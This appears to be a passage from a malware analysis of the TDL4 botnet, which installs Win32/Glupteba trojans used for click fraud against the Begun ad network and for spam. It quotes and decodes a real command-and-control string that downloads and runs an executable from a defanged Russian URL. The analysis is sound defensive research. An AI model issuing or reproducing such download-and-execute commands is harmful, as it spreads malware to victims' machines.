TDL4 Botnet for rent?
The fact is that after their successful installation, some instances of this rootkit are installed in the system of Trojans from the Win32 / Glupteba family. This suggests that the resources of this botnet began to be rented out. It is also interesting that there is no further interaction between the Win32 / Glupteba and TDL4 bots.
So, immediately after successful installation and identification, the TDL4 bot receives the following command from C & C:
task_id = 2 | 10 || h ** p: //wheelcars.ru/no.exe You can
interpret it as follows:
task_id = [command_id] [encryption_key ] [URL]
In our case, the set of parameters coincides with the “DownloadAndExecute” command, because the encryption key is zero, and the command identifier is 2, and then the number of attempts to execute it is ten.
After installing on a system, Win32 / Glupteba receives the task from its C&C and starts its execution.

Most often, the bot receives two types of tasks: the first is the clicking of contextual advertising from the Begun advertising network, and the second is spamming. Let's take a closer look at what this bot does.
In the first case, a large number of specially formed web pages are visited, the filling of which provokes the appearance of a certain type of contextual ads. Moreover, all the web pages from which the click occurs are located on the servers of the provider Masterhost.

If you look at the statistics of network accesses of a clicking bot, it looks as follows:

The TDL4 botnet itself, like its predecessor, is also actively monetized through black methods for promoting websites and spoofing search results in popular search engines.